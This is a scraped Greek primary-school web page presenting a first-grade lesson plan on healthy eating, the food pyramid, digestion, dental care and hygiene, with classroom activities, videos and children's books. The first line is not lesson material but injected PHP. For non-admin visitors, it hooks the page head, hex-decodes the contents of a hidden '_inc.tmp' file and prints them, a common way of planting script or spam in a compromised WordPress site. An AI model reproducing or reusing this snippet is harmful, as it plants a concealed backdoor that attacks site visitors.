if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } ΦΡΟΝΤΙΖΩ ΤΟΝ ΕΑΥΤΟ ΜΟΥ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

ΦΡΟΝΤΙΖΩ ΤΟΝ ΕΑΥΤΟ ΜΟΥ

ΤΑΞΗ : Α΄

ΣΧΟΛ. ΕΤΟΣ : 2013 – 2014

ΚΑΠΕΤΑΝΑΚΗ ΓΕΩΡΓΙΑ ΠΕ70

ΚΟΝΤΟΛΕΟΥ ΜΑΡΙΑ ΠΕ70

ΔΙΔΑΚΤΙΚΟ ΣΕΝΑΡΙΟ

Γενικός σκοπός : Να συνειδητοποιήσουν οι μαθητές τον τρόπο και τη σημασία της φροντίδας της διατροφής τους, του σώματός τους και των δοντιών τους.

Ειδικοί στόχοι: 

  Α. Γνωρίζοντας και κατανοώντας

  • Να γνωρίσουν οι μαθητές ότι η τροφή δίνει την ενέργεια που χρειάζεται ο άνθρωπος για τις καθημερινές του δραστηριότητες.
  • Να γνωρίσουν ποιες τροφές είναι υγιεινές για τον ανθρώπινο οργανισμό και ποιες όχι.
  • Να κατανοήσουν τη σημασία της τροφικής πυραμίδας και τις ομάδες τροφίμων.
  • Να κατανοήσουν τη σημασία της σωματικής άσκησης.
  • Να κατανοήσουν σε γενικές γραμμές τη λειτουργία του πεπτικού συστήματος.
  • Να γνωρίσουν τα στοιχεία που παίρνουμε από διάφορες τροφές.
  • Γνωριμία με την παρασκευή του ψωμιού.
  • Να συνειδητοποιήσουν τη σημασία της περιποίησης των δοντιών μας.
  • Να γνωρίσουν μερικές ασθένειες των δοντιών μας.
  • Να μάθουν το σωστό τρόπο πλυσίματος των δοντιών.
  • Να γνωρίσουν τα μέρη του σώματός τους.
  • Να κατανοήσουν τη σημασία της περιποίησης του σώματός τους.

Β. Ερευνώντας και εντοπίζοντας

  • Να καταστούν οι μαθητές ικανοί να συντάξουν ημερολόγιο για την καθημερινή τους διατροφή και να συνειδητοποιήσουν αν είναι σωστές οι διατροφικές τους συνήθειες.
  • Να καταστούν οι μαθητές ικανοί να δημιουργήσουν ένα πρόγραμμα διατροφής για το δεκατιανό τους στο σχολείο.
  • Να έρθουν σε επαφή με την οδοντοστοιχία τους.
  • Να έρθουν σε επαφή με το χώρο του οδοντιατρείου, να διατυπώσουν τυχόν απορίες τους και να καταλήξουν σε συμπεράσματα.

Γ. Επικοινωνία και συνεργασία με άλλους

  • Επίσκεψη στο σούπερ μάρκετ, το φούρνο και το μανάβικο της γειτονιάς μας και παρατήρηση διάφορων προϊόντων.
  • Επίσκεψη στον οδοντίατρο (ή επίσκεψη του οδοντίατρου στο σχολείο).

Δ. Σύνδεση με τη ζωή

  • Να προσπαθήσουν να εντάξουν στην καθημερινή τους ζωή μία υγιεινότερη διατροφή.
  • Να γίνει στους μαθητές συνήθεια το πλύσιμο των δοντιών μετά από κάθε γεύμα και κυρίως μετά από κάθε γλύκισμα.

Εκτιμώμενη χρονική διάρκεια: 3 μήνες (Ιανουάριος- Φεβρουάριος – Μάρτιος)

Είδος διδακτικής πρακτικής   Ομαδοσυνεργατική , εποικοδομητική προσέγγιση, παιχνίδι ρόλων, μαιευτική, ιδεοθύελλα, συζήτηση, δερευνητική, χρήση ΤΠΕ.

Εκπαιδευτικό υλικό   Internet, χαρτί, χαρτόνι, εικόνες τροφίμων, παραμύθια, φρούτα.

Προαπαιτούμενη γνώση   Να έχουν οι μαθητές στο μυαλό τους ποικιλία τροφίμων.

Το επιστημονικό περιεχόμενο   Η σημασία της διατροφής και της περιποίησης των δοντιών και του σώματος για την υγειά του ανθρώπου.

Δραστηριότητα 1: Σε ένα φύλλο Α3 σχεδιάζουμε ένα ιδεόγραμμα το οποίο συμπληρώνουμε με τις ιδέες που θα διατυπώσουν οι μαθητές στην ερώτηση: «Όταν ακούτε τη φράση υγιεινή διατροφή, τι σας έρχεται στο μυαλό;».

A1.jpg

Δ2: Παιχνίδι με καρτέλες. Οι καρτέλες περιέχουν εικόνες με δραστηριότητες και εικόνες με τρόφιμα (ευεργετικά ή μη για την υγεία του ανθρώπου). Οι μαθητές επιλέγουν δραστηριότητες κι έπειτα πρέπει να βρουν τη σωστή  τροφή που θα τους δώσει ενέργεια για να τις πραγματοποιήσουν. Στο τέλος συμπληρώνουμε το φύλλο εργασίας 1.

A2.jpg

Δ3 : Οι μαθητές συμπληρώνουν ένα ημερολόγιο πρόγραμμα στο οποίο θα αναφέρουν τα φαγητά που θα καταναλώσουν στο χρονικό διάστημα μιας εβδομάδας. Στο τέλος της εβδομάδας παρουσιάζουν τα αποτελέσματα στους συμμαθητές τους και ακολουθεί συζήτηση σχετικά με τις διατροφικές τους συνήθειες.

Δ4: Τα παιδιά κατασκευάζουν τη δική τους διατροφική πυραμίδα εκφράζοντας ανεπηρέαστα την άποψή τους για το ποιες τροφές πρέπει να καταναλώνουμε περισσότερο και ποιες λιγότερο. Συμπληρώνουν το φύλλο εργασίας 4.

A3a.jpgA4a.jpgA5a.jpgA6a.jpg

Δ5: Κατασκευή της διατροφικής πυραμίδας με χαρτόνι και διαχωρισμός των ομάδων τροφίμων. Οι μαθητές θα κολλήσουν πάνω στην πυραμίδα σαν κολάζ, εικόνες από διάφορα τρόφιμα ή εικόνες από έντυπο υλικό που θα φέρουν οι ίδιοι ξεχωρίζοντας τα τρόφιμα στις ομάδες τους. Στο πλάι της πυραμίδας θα ζωγραφίσουν εικόνες με δραστηριότητες για να συνδέσουμε την υγιεινή διατροφή με την άσκηση.

Δ6 :  Συμπληρωματική της δραστηριότητας 5. Τα παιδιά σε πλαστικό πιατάκι ή χαρτόνι προτείνουν «το πιάτο της ημέρας» με βάση μια ισορροπημένη διατροφή κολλώντας εικόνες ή ζωγραφίζοντας τις τροφές. Αποφασίζουμε από κοινού να προσαρμόσουμε το δεκατιανό μας στα πρότυπα της υγιεινής διατροφής.

A10a.jpg

Διαβάζουμε από το ανθολόγιο το κείμενο: «Μια φορά ήταν …… η κολοτούμπα» και κατασκευάζουμε το χέρι με τις ομάδες τροφίμων.

Δ7: Επίσκεψη διατροφολόγου στο σχολείο.

A9a.jpgA8a.jpgA7a.jpg

Δ7α : Ζωγραφίζουμε πάνω σε αληθινά φρούτα, λαχανικά, δημητριακά, όσπρια τους δίνουμε πρόσωπο και λαλιά, προσωποποιούμε ζώα από τα οποία παίρνουμε διάφορα προϊόντα και παίζουμε ένα μικρό θεατρικό δρώμενο παρουσιάζοντας τη θρεπτική αξία διάφορων τροφίμων. Παιχνίδι: Με κλειστά μάτια και την αίσθηση της αφής μαντεύω ποιο φρούτο ή λαχανικό είναι. Παιχνίδι: με κλειστά τα μάτια προσπαθούν οι μαθητές να μαντέψουν ποιο φρούτο ή λαχανικό κτλ είναι.

Δ8: Διαβάζουμε παραμύθια ? βιβλία, ακούμε τραγούδια σχετικά με το θέμα και διασκεδάζουμε.

  1. Από το στάρι στο ψωμί
  2. Το ξωτικό που ήθελε να ψηλώσει
  3. Ο κύριος Κιουκ έχει λόξιγκα
  4. Το φαγητό δεν είναι μόνο για να χορταίνουμε.
  5. Το χοντρό μπιζέλι
  6. Φρούτα φρουτ
  7. Τόσο λάθος διατροφή
  8. Μίλα μου για μήλα
  9. Το καρότο και η αγκινάρα

Δ9 : Σχεδιάζουμε το περίγραμμα ενός μαθητή σε χαρτί του μέτρου και κολλάμε πάνω τα όργανα του πεπτικού μας συστήματος τα οποία έχουμε εκτυπώσει σε χαρτί Α4 ή Α3, αφού πρώτα παρακολουθήσουμε το βίντεο: « Μια φορά ήταν η ζωή ? η πέψη» με τη βοήθεια του youtube. (http://www.youtube.com/watch?v=FiQ4M4ESuUU)

A12a.jpg

Τα δόντια

  Δ1: Με τη βοήθεια ενός καθρέφτη μετράμε και παρατηρούμε τα δόντια μας.

Δ2 : Παρακολουθούμε σχετικό βίντεο: « Μια φορά ήταν η ζωή ? τα δόντια» (http://www.youtube.com/watch?v=sAt1j_p824g) και συζητάμε ό,τι είδαμε.

Δ3: Παρακολουθούμε σχετικό βίντεο κινουμένων σχεδίων «Ο Ντάντλι επισκέπτεται τον οδοντίατρο»(youtube), και  «www.healthyteeth.org». Ακολουθεί συζήτηση και διεξαγωγή συμπερασμάτων.

Δ4: Επίσκεψη οδοντίατρου στο σχολικό χώρο.

A11a.jpg

Δ4 α: Μαθαίνω να πλένω σωστά τα δόντια μου.

Δ5: Διαβάζουμε σχετικά παραμύθια: «Η Δόνα Τερηδόνα» , «Ο Ιππόλυτος ο Ιπποπόταμος»

Καθαρό σώμα

Δ1 : Σε χαρτί του μέτρου σχεδιάζουμε το περίγραμμα ενός μαθητή και γράφουμε πάνω οδηγίες για το πώς πρέπει να διατηρούμε καθαρό το σώμα μας, τα βασικά όργανα του πεπτικού συστήματος και τα μέρη του σώματος.

A12a.jpg

Δ2 : Ακούμε τραγούδια για το σώμα μας. (Ζουζούνια ? Κεφάλι , ώμοι , γόνατα και δάχτυλα, Τραγουδάμε για το ένα, Χαρωπά τα δυο μου χέρια τα χτυπώ)

Αξιολόγηση: Κατά τη διάρκεια εκτέλεσης του διδακτικού σεναρίου οι μαθητές συμμετείχαν ενεργά. Πολλοί μαθητές υιοθέτησαν τον υγιεινό τρόπο διατροφής κάνοντας εφαρμογή στο καθημερινό δεκατιανό που έφερναν στο σχολείο.

Βιβλιογραφία:   Ανθολόγιο , «Μια φορά ήταν ……. η κολοτούμπα», σελ. 65 Ο κύριος Κιουκ έχει λόξιγκα, Μαρία Ρουσάκη Το φαγητό δεν είναι μόνο για να χορταίνουμε, Ελένη Χαρατσή ? Γιωτάκη Από το στάρι στο ψωμί, Ελένη Σβορώνου Το ξωτικό που ήθελε να ψηλώσει, Καλλιόπη Εμμανουηλίδου